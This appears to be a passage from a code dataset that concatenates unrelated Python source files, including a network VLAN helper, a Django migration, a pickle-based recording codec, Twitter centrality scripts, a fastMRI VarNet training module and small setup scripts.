ambiente__in=envs_of_vlans
).exclude(ambiente=env.id)]
if len(other_envs) > 0:
raise CannotDissociateFilterError(
old_fil.name, u'Filter %s cannot be dissociated, its in use.' % old_fil.name)
env.filter = new_fil
return env
# End of filters
def verify_subnet_and_equip(vlan_net, network_ip, version, net_obj, env_obj):
# Check if an equipment is shared in a subnet
equip_list = get_equips(net_obj, env_obj)
# One vlan may have many networks, iterate over it
for net_env in vlan_net:
net = net_env.get('net')
env = net_env.get('vlan_env')
if version == 'v4':
ip = '%s.%s.%s.%s/%s' % (net.oct1, net.oct2, net.oct3,
net.oct4, net.block)
else:
ip = '%s:%s:%s:%s:%s:%s:%s:%s/%d' % (net.block1, net.block2, net.block3,
net.block4, net.block5, net.block6,
net.block7, net.block8, net.block)
ip_net = IPNetwork(ip)
# If some network, inside this vlan, is subnet of network search param
if ip_net in network_ip:
equip_list_aux = get_equips(net, env)
if len(set(equip_list) & set(equip_list_aux)) > 0:
# This vlan must be in vlans founded, dont need to continue
# checking
return True
# If some network, inside this vlan, is supernet of network search
# param
if network_ip in ip_net:
equip_list_aux = get_equips(net, env)
if len(set(equip_list) & set(equip_list_aux)) > 0:
# This vlan must be in vlans founded, dont need to continue
# checking
return True
# If dont found any subnet return None
return False
def get_equips(net_obj, env_obj):
equip_list = list()
for equip in env_obj.equipamentoambiente_set.all():
if equip.equipamento_id not in equip_list:
equip_list.append(equip.equipamento_id)
try:
for ip in net_obj.ip_set.all():
for equip in ip.ipequipamento_set.all():
if equip.id not in equip_list:
equip_list.append(equip.id)
except:
for ip in net_obj.ipv6_set.all():
for equip in ip.ipv6equipament_set.all():
if equip.id not in equip_list:
equip_list.append(equip.id)
return equip_list
| 1.984375 | 2 |
tickets/migrations/0001_initial.py | dieisonborges/sicario | 1 | 12761636 | # Generated by Django 3.1.2 on 2020-10-20 19:06
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Ticket',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('protcol', models.CharField(max_length=10)),
('status', models.BooleanField(default=False)),
('short_description', models.CharField(max_length=50)),
('description', models.CharField(max_length=200)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Action',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('short_description', models.CharField(max_length=50)),
('description', models.CharField(max_length=200)),
('ticket', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tickets.ticket')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 1.710938 | 2 |
aionetworking/formats/recording.py | primal100/aionetworking | 0 | 12761637 | <reponame>primal100/aionetworking<gh_stars>0
from dataclasses import dataclass
from .base import BaseMessageObject
from collections import namedtuple
from pathlib import Path
from .contrib.pickle import PickleCodec
from typing import AsyncGenerator
recorded_packet = namedtuple("recorded_packet", ["sent_by_server", "timestamp", "sender", "data"])
@dataclass
class BufferCodec(PickleCodec):
log_msgs = False
async def decode(self, encoded: bytes, **kwargs) -> recorded_packet:
async for encoded, decoded in super().decode(encoded, **kwargs):
yield encoded, recorded_packet(*decoded)
async def encode(self, decoded: bytes, system_timestamp=None, **kwargs) -> bytes:
if self.context:
sender = self.context.get('address')
else:
sender = None
packet_data = (
False,
system_timestamp,
sender,
decoded
)
return await super().encode(packet_data, **kwargs)
@dataclass
class BufferObject(BaseMessageObject):
name = 'Buffer'
codec_cls = BufferCodec
def get_recording_codec() -> PickleCodec:
return BufferCodec(BufferObject)
async def get_recording(data: bytes) -> AsyncGenerator[recorded_packet, None]:
codec = get_recording_codec()
async for item in codec.decode_buffer(data):
yield item.decoded
async def get_recording_from_file(path: Path) -> AsyncGenerator[recorded_packet, None]:
codec = get_recording_codec()
async for item in codec.from_file(path):
yield item.decoded
| 2.296875 | 2 |
resources/site-packages/kodi_six/xbmcplugin.py | projectx13/plugin.video.projectx | 0 | 12761638 | <reponame>projectx13/plugin.video.projectx
# coding: utf-8
# Created on: 04.01.2018
# Author: <NAME> aka <NAME>. (<EMAIL>)
"""
Functions to create media contents plugins
"""
from __future__ import absolute_import
import sys as _sys
from .utils import PY2 as _PY2, ModuleWrapper as _ModuleWrapper
if _PY2:
import xbmcplugin as _xbmcplugin
_wrapped_xbmcplugin = _ModuleWrapper(_xbmcplugin)
_sys.modules[__name__] = _wrapped_xbmcplugin
else:
from xbmcplugin import *
| 1.328125 | 1 |
ex3_03.py | sevmardi/Twitter-network-analysis | 0 | 12761639 | <filename>ex3_03.py
import networkx as nx
import numpy as np
import cPickle as pickle
# import _pickle as pickle
from timeit import default_timer as timer
from graph_tool.all import *
from operator import itemgetter
from collections import Counter
import math
import csv
csv_twitter_small_dataset = "csv/twitter-small.csv"
csv_graph_tool_twitter_small_dataset = 'csv/csv_graph_tool_twitter-small.csv'
csv_twitter_large_dataset = "csv/twitter-large.csv"
csv_graph_tool_twitter_large_dataset = 'csv/csv_graph_tool_twitter-large.csv'
def closeness_centrality(Graph, vp_source_username):
close = graph_tool.centrality.closeness(Graph)
c_list = []
for user in Graph.vertices():
if close[user] > 0:
c_list += [(vp_source_username[user], close[user])]
c_list = sorted(c_list, key=itemgetter(1), reverse=True)[:20]
# print('Closness')
for i in range(len(c_list)):
print(c_list[i][0])
print('\n')
def betweenness_centrality(Graph, vp_source_username):
betweenness = graph_tool.centrality.betweenness(Graph)
b_list = []
print('Betweenness')
for user in Graph.vertices():
if betweenness[0][user] > 0:
b_list += ([vp_source_username[user], betweenness[0][user]])
b_list = sorted(b_list, key=itemgetter(1), reverse=True)[:20]
for i in range(len(b_list)):
print(b_list[i][0])
print('\n')
def in_degree_centrality(file):
parser = parse_file_to_digraph(file)
idg = nx.in_degree_centrality(parser)
idc_list = []
for user in idg:
idc_list += [(user, idg[user])]
print('In Degree Centrality')
idc_list = sorted(idc_list, key=itemgetter(1), reverse=True)[:20]
for i in range(len(idc_list)):
print(idc_list[i][0])
def out_degree_centrality(file):
parser = parse_file_to_digraph(file)
odg = nx.out_degree_centrality(parser)
odc_list = []
for user in odg:
odc_list += [(user, odg[user])]
print('Out Degree Centrality')
odc_list = sorted(odc_list, key=itemgetter(1), reverse=True)[:20]
for i in range(len(odc_list)):
print(odc_list[i][0])
print('\n')
def parse_file_to_digraph(filename):
"""
Create a Di graph.
"""
dg = nx.DiGraph()
with open(filename, 'r') as files:
for line in files:
line = line.rstrip('\n')
v = line.split(",")
dg.add_edge(v[0], v[1], {'weight': v[2], 'timestamp': v[3]})
return dg
def main():
# small = parse_file_to_digraph(csv_twitter_small_dataset)
# in_degree_centrality(small)
# large = parse_file_to_digraph(csv_twitter_large_dataset)
# in_degree_centrality(large)
G = Graph()
start_time = timer()
vp_source_username = G.new_vertex_property("string")
vp_target_username = G.new_vertex_property("string")
vp_weight = G.new_vertex_property("int")
vp_timestamp = G.new_vertex_property("int")
with open(csv_graph_tool_twitter_small_dataset, 'r') as file:
reader = csv.reader(file, delimiter=',', quotechar='|')
reader.next() # skip header
for c in reader:
src_id = c[0]
target_id = c[1]
src_name = c[2]
target_name = c[3]
G.add_edge(src_id, target_id)
vp_source_username[G.vertex(src_id)] = src_name
vp_target_username[G.vertex(target_id)] = target_name
out_degree_centrality(csv_twitter_small_dataset)
if __name__ == '__main__':
main()
| 2.5625 | 3 |
fastmri_examples/adaptive_varnet/pl_modules/varnet_module.py | Gaskell-1206/fastMRI | 0 | 12761640 | """
Copyright (c) Facebook, Inc. and its affiliates.
This source code is licensed under the MIT license found in the
LICENSE file in the root directory of this source tree.
"""
from argparse import ArgumentParser
from collections import defaultdict
from typing import Optional
import fastmri
import numpy as np
import torch
import torch.nn as nn
from fastmri import evaluate
from fastmri.data import transforms
from fastmri.data.transforms import VarNetSample
from fastmri.models.adaptive_varnet import AdaptiveSensitivityModel, AdaptiveVarNetBlock
from fastmri.models.varnet import NormUnet
from fastmri.pl_modules.mri_module import MriModule
from .metrics import DistributedMetricSum, DistributedArraySum
class VarNet(nn.Module):
"""
A full variational network model.
This model applies a combination of soft data consistency with a U-Net
regularizer. To use non-U-Net regularizers, use VarNetBlock.
"""
def __init__(
self,
num_cascades: int = 12,
sens_chans: int = 8,
sens_pools: int = 4,
chans: int = 18,
pools: int = 4,
num_sense_lines: Optional[int] = None,
hard_dc: bool = False,
dc_mode: str = "simul",
sparse_dc_gradients: bool = True,
):
"""
Args:
num_cascades: Number of cascades (i.e., layers) for variational
network.
sens_chans: Number of channels for sensitivity map U-Net.
sens_pools Number of downsampling and upsampling layers for
sensitivity map U-Net.
chans: Number of channels for cascade U-Net.
pools: Number of downsampling and upsampling layers for cascade
U-Net.
num_sense_lines: Number of low-frequency lines to use for
sensitivity map computation, must be even or `None`. Default
`None` will automatically compute the number from masks.
Default behaviour may cause some slices to use more
low-frequency lines than others, when used in conjunction with
e.g. the EquispacedMaskFunc defaults.
hard_dc: Whether to do hard DC layers instead of soft (learned).
dc_mode: str, whether to do DC before ('first'), after ('last') or
simultaneously ('simul') with Refinement step. Default 'simul'.
sparse_dc_gradients: Whether to sparsify the gradients in DC by
using torch.where() with the mask: this essentially removes
gradients for the policy on unsampled rows. This should change
nothing for the non-active VarNet.
"""
super().__init__()
self.num_sense_lines = num_sense_lines
self.hard_dc = hard_dc
self.dc_mode = dc_mode
self.sparse_dc_gradients = sparse_dc_gradients
self.sens_net = AdaptiveSensitivityModel(
sens_chans, sens_pools, num_sense_lines=num_sense_lines
)
self.cascades = nn.ModuleList(
[
AdaptiveVarNetBlock(
NormUnet(chans, pools),
hard_dc=hard_dc,
dc_mode=dc_mode,
sparse_dc_gradients=sparse_dc_gradients,
)
for _ in range(num_cascades)
]
)
def forward(
self, kspace: torch.Tensor, masked_kspace: torch.Tensor, mask: torch.Tensor
):
extra_outputs = defaultdict(list)
sens_maps = self.sens_net(masked_kspace, mask)
extra_outputs["sense"].append(sens_maps.detach().cpu())
kspace_pred = masked_kspace.clone()
extra_outputs["masks"].append(mask.detach().cpu())
# Store current reconstruction
current_recon = fastmri.complex_abs(
self.sens_reduce(masked_kspace, sens_maps)
).squeeze(1)
extra_outputs["recons"].append(current_recon.detach().cpu())
for cascade in self.cascades:
kspace_pred = cascade(
kspace_pred, masked_kspace, mask, sens_maps, kspace=kspace
)
# Store current reconstruction
current_recon = fastmri.complex_abs(
self.sens_reduce(masked_kspace, sens_maps)
).squeeze(1)
extra_outputs["recons"].append(current_recon.detach().cpu())
# Could presumably do complex_abs(complex_rss()) instead and get same result?
output = fastmri.rss(fastmri.complex_abs(fastmri.ifft2c(kspace_pred)), dim=1)
return output, extra_outputs
def sens_reduce(self, x: torch.Tensor, sens_maps: torch.Tensor) -> torch.Tensor:
x = fastmri.ifft2c(x)
return fastmri.complex_mul(x, fastmri.complex_conj(sens_maps)).sum(
dim=1, keepdim=True
)
class VarNetModule(MriModule):
"""
VarNet training module.
This can be used to train variational networks from the paper:
<NAME> al. End-to-end variational networks for accelerated MRI
reconstruction. In International Conference on Medical Image Computing and
Computer-Assisted Intervention, 2020.
which was inspired by the earlier paper:
<NAME> et al. Learning a variational network for reconstruction of
accelerated MRI data. Magnetic Resonance inMedicine, 79(6):3055–3071, 2018.
"""
def __init__(
self,
num_cascades: int = 12,
pools: int = 4,
chans: int = 18,
sens_pools: int = 4,
sens_chans: int = 8,
lr: float = 0.0003,
lr_step_size: int = 40,
lr_gamma: float = 0.1,
weight_decay: float = 0.0,
num_sense_lines: int = None,
hard_dc: bool = False,
dc_mode: str = "simul",
sparse_dc_gradients: bool = True,
**kwargs,
):
"""
Args:
num_cascades: Number of cascades (i.e., layers) for variational
network.
pools: Number of downsampling and upsampling layers for cascade
U-Net.
chans: Number of channels for cascade U-Net.
sens_pools: Number of downsampling and upsampling layers for
sensitivity map U-Net.
sens_chans: Number of channels for sensitivity map U-Net.
lr: Learning rate.
lr_step_size: Learning rate step size.
lr_gamma: Learning rate gamma decay.
weight_decay: Parameter for penalizing weights norm.
num_sense_lines: Number of low-frequency lines to use for sensitivity map
computation, must be even or `None`. Default `None` will automatically
compute the number from masks. Default behaviour may cause some slices to
use more low-frequency lines than others, when used in conjunction with
e.g. the EquispacedMaskFunc defaults.
hard_dc: Whether to do hard DC layers instead of soft (learned).
dc_mode: str, whether to do DC before ('first'), after ('last') or
simultaneously ('simul') with Refinement step. Default 'simul'.
sparse_dc_gradients: Whether to sparsify the gradients in DC by using torch.where()
with the mask: this essentially removes gradients for the policy on unsampled rows. This should
change nothing for the non-active VarNet.
"""
super().__init__()
self.save_hyperparameters()
self.num_cascades = num_cascades
self.pools = pools
self.chans = chans
self.sens_pools = sens_pools
self.sens_chans = sens_chans
self.lr = lr
self.lr_step_size = lr_step_size
self.lr_gamma = lr_gamma
self.weight_decay = weight_decay
self.num_sense_lines = num_sense_lines
self.hard_dc = hard_dc
self.dc_mode = dc_mode
self.sparse_dc_gradients = sparse_dc_gradients
# logging functions
self.NMSE = DistributedMetricSum()
self.SSIM = DistributedMetricSum()
self.PSNR = DistributedMetricSum()
self.ValLoss = DistributedMetricSum()
self.TotExamples = DistributedMetricSum()
self.TotSliceExamples = DistributedMetricSum()
self.ValMargDist = DistributedArraySum()
self.ValCondEnt = DistributedMetricSum()
self.TrainNMSE = DistributedMetricSum()
self.TrainSSIM = DistributedMetricSum()
self.TrainPSNR = DistributedMetricSum()
self.TrainLoss = DistributedMetricSum()
self.TrainTotExamples = DistributedMetricSum()
self.TrainTotSliceExamples = DistributedMetricSum()
self.TrainMargDist = DistributedArraySum()
self.TrainCondEnt = DistributedMetricSum()
self.varnet = VarNet(
num_cascades=self.num_cascades,
sens_chans=self.sens_chans,
sens_pools=self.sens_pools,
chans=self.chans,
pools=self.pools,
num_sense_lines=self.num_sense_lines,
hard_dc=self.hard_dc,
dc_mode=self.dc_mode,
sparse_dc_gradients=self.sparse_dc_gradients,
)
self.loss = fastmri.SSIMLoss()
def forward(self, kspace, masked_kspace, mask):
return self.varnet(kspace, masked_kspace, mask)
def training_step(self, batch, batch_idx):
output, extra_outputs = self(batch.kspace, batch.masked_kspace, batch.mask)
target, output = transforms.center_crop_to_smallest(batch.target, output)
# NOTE: Using max value here...
loss = self.loss(
output.unsqueeze(1), target.unsqueeze(1), data_range=batch.max_value
)
self.log("train_loss", loss)
# Return same stuff as on validation step here
return {
"batch_idx": batch_idx,
"fname": batch.fname,
"slice_num": batch.slice_num,
"max_value": batch.max_value,
"output": output,
"target": target,
"loss": loss,
"extra_outputs": extra_outputs,
}
def training_step_end(self, train_logs):
# check inputs
for k in (
"batch_idx",
"fname",
"slice_num",
"max_value",
"output",
"target",
"loss",
"extra_outputs",
):
if k not in train_logs.keys():
raise RuntimeError(
f"Expected key {k} in dict returned by training_step."
)
if train_logs["output"].ndim == 2:
train_logs["output"] = train_logs["output"].unsqueeze(0)
elif train_logs["output"].ndim != 3:
raise RuntimeError("Unexpected output size from training_step.")
if train_logs["target"].ndim == 2:
train_logs["target"] = train_logs["target"].unsqueeze(0)
elif train_logs["target"].ndim != 3:
raise RuntimeError("Unexpected output size from training_step.")
# compute evaluation metrics
mse_vals = defaultdict(dict)
target_norms = defaultdict(dict)
ssim_vals = defaultdict(dict)
max_vals = dict()
for i, fname in enumerate(train_logs["fname"]):
slice_num = int(train_logs["slice_num"][i].cpu())
maxval = train_logs["max_value"][i].cpu().numpy()
output = train_logs["output"][i].detach().cpu().numpy()
target = train_logs["target"][i].cpu().numpy()
mse_vals[fname][slice_num] = torch.tensor(
evaluate.mse(target, output)
).view(1)
target_norms[fname][slice_num] = torch.tensor(
evaluate.mse(target, np.zeros_like(target))
).view(1)
ssim_vals[fname][slice_num] = torch.tensor(
evaluate.ssim(target[None, ...], output[None, ...], maxval=maxval)
).view(1)
max_vals[fname] = maxval
return {
"loss": train_logs["loss"],
"mse_vals": mse_vals,
"target_norms": target_norms,
"ssim_vals": ssim_vals,
"max_vals": max_vals,
}
def validation_step(self, batch, batch_idx):
batch: VarNetSample
output, extra_outputs = self.forward(
batch.kspace, batch.masked_kspace, batch.mask
)
target, output = transforms.center_crop_to_smallest(batch.target, output)
return {
"batch_idx": batch_idx,
"fname": batch.fname,
"slice_num": batch.slice_num,
"max_value": batch.max_value,
"output": output,
"target": target,
"val_loss": self.loss(
output.unsqueeze(1), target.unsqueeze(1), data_range=batch.max_value
),
"extra_outputs": extra_outputs,
}
def validation_step_end(self, val_logs):
# check inputs
for k in (
"batch_idx",
"fname",
"slice_num",
"max_value",
"output",
"target",
"val_loss",
):
if k not in val_logs.keys():
raise RuntimeError(
f"Expected key {k} in dict returned by validation_step."
)
if val_logs["output"].ndim == 2:
val_logs["output"] = val_logs["output"].unsqueeze(0)
elif val_logs["output"].ndim != 3:
raise RuntimeError("Unexpected output size from validation_step.")
if val_logs["target"].ndim == 2:
val_logs["target"] = val_logs["target"].unsqueeze(0)
elif val_logs["target"].ndim != 3:
raise RuntimeError("Unexpected output size from validation_step.")
# pick a set of images to log if we don't have one already
if self.val_log_indices is None:
self.val_log_indices = list(
np.random.permutation(len(self.trainer.val_dataloaders[0]))[
: self.num_log_images
]
)
# log images to tensorboard
if isinstance(val_logs["batch_idx"], int):
batch_indices = [val_logs["batch_idx"]]
else:
batch_indices = val_logs["batch_idx"]
for i, batch_idx in enumerate(batch_indices):
if batch_idx in self.val_log_indices:
key = f"val_images_idx_{batch_idx}"
target = val_logs["target"][i].unsqueeze(0)
output = val_logs["output"][i].unsqueeze(0)
error = torch.abs(target - output)
output = output / output.max()
target = target / target.max()
error = error / error.max()
self.log_image(f"{key}/target", target)
self.log_image(f"{key}/reconstruction", output)
self.log_image(f"{key}/error", error)
# compute evaluation metrics
mse_vals = defaultdict(dict)
target_norms = defaultdict(dict)
ssim_vals = defaultdict(dict)
max_vals = dict()
for i, fname in enumerate(val_logs["fname"]):
slice_num = int(val_logs["slice_num"][i].cpu())
maxval = val_logs["max_value"][i].cpu().numpy()
output = val_logs["output"][i].cpu().numpy()
target = val_logs["target"][i].cpu().numpy()
mse_vals[fname][slice_num] = torch.tensor(
evaluate.mse(target, output)
).view(1)
target_norms[fname][slice_num] = torch.tensor(
evaluate.mse(target, np.zeros_like(target))
).view(1)
ssim_vals[fname][slice_num] = torch.tensor(
evaluate.ssim(target[None, ...], output[None, ...], maxval=maxval)
).view(1)
max_vals[fname] = maxval
return {
"val_loss": val_logs["val_loss"],
"mse_vals": mse_vals,
"target_norms": target_norms,
"ssim_vals": ssim_vals,
"max_vals": max_vals,
}
def training_epoch_end(self, train_logs):
losses = []
mse_vals = defaultdict(dict)
target_norms = defaultdict(dict)
ssim_vals = defaultdict(dict)
max_vals = dict()
# use dict updates to handle duplicate slices
for train_log in train_logs:
losses.append(train_log["loss"].data.view(-1))
for k in train_log["mse_vals"].keys():
mse_vals[k].update(train_log["mse_vals"][k])
for k in train_log["target_norms"].keys():
target_norms[k].update(train_log["target_norms"][k])
for k in train_log["ssim_vals"].keys():
ssim_vals[k].update(train_log["ssim_vals"][k])
for k in train_log["max_vals"]:
max_vals[k] = train_log["max_vals"][k]
# check to make sure we have all files in all metrics
assert (
mse_vals.keys()
== target_norms.keys()
== ssim_vals.keys()
== max_vals.keys()
)
# apply means across image volumes
metrics = {"nmse": 0, "ssim": 0, "psnr": 0}
local_examples = 0
for fname in mse_vals.keys():
local_examples = local_examples + 1
mse_val = torch.mean(
torch.cat([v.view(-1) for _, v in mse_vals[fname].items()])
)
target_norm = torch.mean(
torch.cat([v.view(-1) for _, v in target_norms[fname].items()])
)
metrics["nmse"] = metrics["nmse"] + mse_val / target_norm
metrics["psnr"] = (
metrics["psnr"]
+ 20
* torch.log10(
torch.tensor(
max_vals[fname], dtype=mse_val.dtype, device=mse_val.device
)
)
- 10 * torch.log10(mse_val)
)
metrics["ssim"] = metrics["ssim"] + torch.mean(
torch.cat([v.view(-1) for _, v in ssim_vals[fname].items()])
)
# reduce across ddp via sum
metrics["nmse"] = self.TrainNMSE(metrics["nmse"])
metrics["ssim"] = self.TrainSSIM(metrics["ssim"])
metrics["psnr"] = self.TrainPSNR(metrics["psnr"])
tot_examples = self.TrainTotExamples(torch.tensor(local_examples))
train_loss = self.TrainLoss(torch.sum(torch.cat(losses)))
tot_slice_examples = self.TrainTotSliceExamples(
torch.tensor(len(losses), dtype=torch.float)
)
self.log("training_loss", train_loss / tot_slice_examples, prog_bar=True)
for metric, value in metrics.items():
self.log(f"train_metrics/{metric}", value / tot_examples)
def validation_epoch_end(self, val_logs):
# aggregate losses
losses = []
mse_vals = defaultdict(dict)
target_norms = defaultdict(dict)
ssim_vals = defaultdict(dict)
max_vals = dict()
# use dict updates to handle duplicate slices
for val_log in val_logs:
losses.append(val_log["val_loss"].view(-1))
for k in val_log["mse_vals"].keys():
mse_vals[k].update(val_log["mse_vals"][k])
for k in val_log["target_norms"].keys():
target_norms[k].update(val_log["target_norms"][k])
for k in val_log["ssim_vals"].keys():
ssim_vals[k].update(val_log["ssim_vals"][k])
for k in val_log["max_vals"]:
max_vals[k] = val_log["max_vals"][k]
# check to make sure we have all files in all metrics
assert (
mse_vals.keys()
== target_norms.keys()
== ssim_vals.keys()
== max_vals.keys()
)
# apply means across image volumes
metrics = {"nmse": 0, "ssim": 0, "psnr": 0}
local_examples = 0
for fname in mse_vals.keys():
local_examples = local_examples + 1
mse_val = torch.mean(
torch.cat([v.view(-1) for _, v in mse_vals[fname].items()])
)
target_norm = torch.mean(
torch.cat([v.view(-1) for _, v in target_norms[fname].items()])
)
metrics["nmse"] = metrics["nmse"] + mse_val / target_norm
metrics["psnr"] = (
metrics["psnr"]
+ 20
* torch.log10(
torch.tensor(
max_vals[fname], dtype=mse_val.dtype, device=mse_val.device
)
)
- 10 * torch.log10(mse_val)
)
metrics["ssim"] = metrics["ssim"] + torch.mean(
torch.cat([v.view(-1) for _, v in ssim_vals[fname].items()])
)
# reduce across ddp via sum
metrics["nmse"] = self.NMSE(metrics["nmse"])
metrics["ssim"] = self.SSIM(metrics["ssim"])
metrics["psnr"] = self.PSNR(metrics["psnr"])
tot_examples = self.TotExamples(torch.tensor(local_examples))
val_loss = self.ValLoss(torch.sum(torch.cat(losses)))
tot_slice_examples = self.TotSliceExamples(
torch.tensor(len(losses), dtype=torch.float)
)
self.log("validation_loss", val_loss / tot_slice_examples, prog_bar=True)
for metric, value in metrics.items():
self.log(f"val_metrics/{metric}", value / tot_examples)
def test_step(self, batch, batch_idx):
kspace, masked_kspace, mask, _, fname, slice_num, _, crop_size = batch
crop_size = crop_size[0] # always have a batch size of 1 for varnet
output, extra_outputs = self(kspace, masked_kspace, mask)
# check for FLAIR 203
if output.shape[-1] < crop_size[1]:
crop_size = (output.shape[-1], output.shape[-1])
output = transforms.center_crop(output, crop_size)
return {
"fname": fname,
"slice": slice_num,
"output": output.cpu().numpy(),
}
def configure_optimizers(self):
# This needs to be a class attribute for storing of gradients workaround
self.optim = torch.optim.Adam(
self.parameters(), lr=self.lr, weight_decay=self.weight_decay
)
scheduler = torch.optim.lr_scheduler.StepLR(
self.optim, self.lr_step_size, self.lr_gamma
)
return [self.optim], [scheduler]
@staticmethod
def add_model_specific_args(parent_parser): # pragma: no-cover
"""
Define parameters that only apply to this model
"""
parser = ArgumentParser(parents=[parent_parser], add_help=False)
parser = MriModule.add_model_specific_args(parser)
# param overwrites
# network params
parser.add_argument(
"--num_cascades",
default=12,
type=int,
help="Number of VarNet cascades",
)
parser.add_argument(
"--pools",
default=4,
type=int,
help="Number of U-Net pooling layers in VarNet blocks",
)
parser.add_argument(
"--chans",
default=18,
type=int,
help="Number of channels for U-Net in VarNet blocks",
)
parser.add_argument(
"--sens_pools",
default=4,
type=int,
help="Number of pooling layers for sense map estimation U-Net in VarNet",
)
parser.add_argument(
"--sens_chans",
default=8,
type=float,
help="Number of channels for sense map estimation U-Net in VarNet",
)
# training params (opt)
parser.add_argument(
"--lr", default=0.0003, type=float, help="Adam learning rate"
)
parser.add_argument(
"--lr_step_size",
default=40,
type=int,
help="Epoch at which to decrease step size",
)
parser.add_argument(
"--lr_gamma",
default=0.1,
type=float,
help="Extent to which step size should be decreased",
)
parser.add_argument(
"--weight_decay",
default=0.0,
type=float,
help="Strength of weight decay regularization",
)
return parser
| 2 | 2 |
src/jsstitcher/jslinker/main.py | DarkTrick/SourceCodeVisualizer | 11 | 12761641 | from jslinker.js_file_stitcher import JsFileStitcher
import sys
import os
class JsStitcherCUI:
@staticmethod
def showHelp():
print("""
Run: jsstitcher inputfile
Works like a simplified version of the C++ preprocessor.
- require ("<file path>");
Tells jsstitcher to include file content of <file path> into the output.
E.g.
fileA:
require ("fileB.js");
IMPORTANT:
Use exaclty the pattern described above:
- There must be exactly one space before the bracket
- Use doublequotes ( " ) only - no single quotes
- There must be a semicolon at the end
Constraints:
- Does not solve dependency loops and would run forever then.
(E.g. A -> B -> C -> A)
""")
def _run (self, infile):
stitcher = JsFileStitcher ([infile])
result = stitcher.run()
if (result == True):
print (stitcher.getStitchedContent ())
else:
print (result)
def run(self,args):
if (len(args) < 1):
self.__class__.showHelp()
return
infile = args[0]
os.path.abspath (infile)
self._run (infile)
| 2.46875 | 2 |
src/wai_data_tools/scripts/manually_reclassify_frames.py | wildlifeai/wai_data_tools | 0 | 12761642 | <filename>src/wai_data_tools/scripts/manually_reclassify_frames.py
"""Script for manually reclassifying frames in a frame image dataset."""
import logging
import pathlib
import pandas as pd
import tqdm
from wai_data_tools import config, io
from wai_data_tools.manual_annotation import controller, model, view
def manually_reclassify_frames(
src_root_dir: pathlib.Path,
config_filepath: pathlib.Path,
) -> None:
"""Manually reclassify assigned classes to frame images using a Tkinter GUI.
Args:
src_root_dir: Path to the source root directory to read frame images
config_filepath: Path to configuration file
"""
logger = logging.getLogger(__name__)
logger.info("Reading config file")
dataset_config = config.load_config(config_filepath=config_filepath)
classes = [label_config["name"] for label_config in dataset_config["labels"] if label_config["is_target"]]
classes.append("background")
logger.info("Found classes %s", classes)
df_frames = pd.read_csv(src_root_dir / "frame_information.csv")
dataset_dir = src_root_dir / "dataset"
logger.info("Starting GUI for reclassification")
video_dirs = [dir_path for dir_path in dataset_dir.iterdir() if dir_path.is_dir()]
for video_dir in tqdm.tqdm(video_dirs):
frames_dict = io.load_frames(frame_dir=video_dir, df_frames=df_frames)
annotation_model = model.ManualAnnotationModel(
frame_dict=frames_dict,
df_frames=df_frames,
video_name=video_dir.name,
src_dir=src_root_dir,
classes=classes,
)
annotation_view = view.ManualAnnotationView()
annotation_controller = controller.ManualAnnotationController(model=annotation_model, view=annotation_view)
annotation_view.set_controller(controller=annotation_controller)
annotation_view.update_view()
annotation_view.show()
| 2.5 | 2 |
gen_colors.py | kewitz/master | 3 | 12761643 | <gh_stars>1-10
# -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2014 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import NScheme as ns
files = ["./res/L10.msh"]
#files = ["./res/L2.msh"]
def validateColors(colors):
v = True
for color in colors:
for nodes in color:
elements = [e for n in nodes for e in n.elements]
cv = len(elements) == len(set(elements))
v = v and cv
if not cv:
break
assert v, "Existem nós com elementos em comum em uma mesma cor."
bound = {2: 100.0, 5: 0.0}
for f in files:
m = ns.Mesh(file=f, verbose=True, debug=True)
limit = ns.lib.alloc(len(m.nodes))
colors = m.makeColors(limit, bound, 1)
validateColors(colors)
dof = len([n for n in m.nodes if n.calc])
nodes_mapped = sum([len(c) for g in colors for c in g])
assert dof == nodes_mapped, "Faltando nós. {} < {}".format(nodes_mapped, dof)
print "Done." | 1.898438 | 2 |
setup.py | tuanle618/Img2Mol | 53 | 12761644 | <reponame>tuanle618/Img2Mol
# Copyright 2021 Machine Learning Research @ Bayer AG
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Install script for setuptools."""
from setuptools import setup
setup(
name='img2mol',
version='0.1',
packages=['img2mol'],
url='https://github.com/bayer-science-for-a-better-life/Img2Mol',
license='Apache License, Version 2.0',
author='<NAME>, <NAME>, <NAME> and <NAME>',
author_email='<EMAIL>',
description='Inferring molecules from images'
)
| 1.335938 | 1 |
start.py | Jajabenit250/flask-with-fairseq | 0 | 12761645 | <reponame>Jajabenit250/flask-with-fairseq<filename>start.py
from flask import Flask
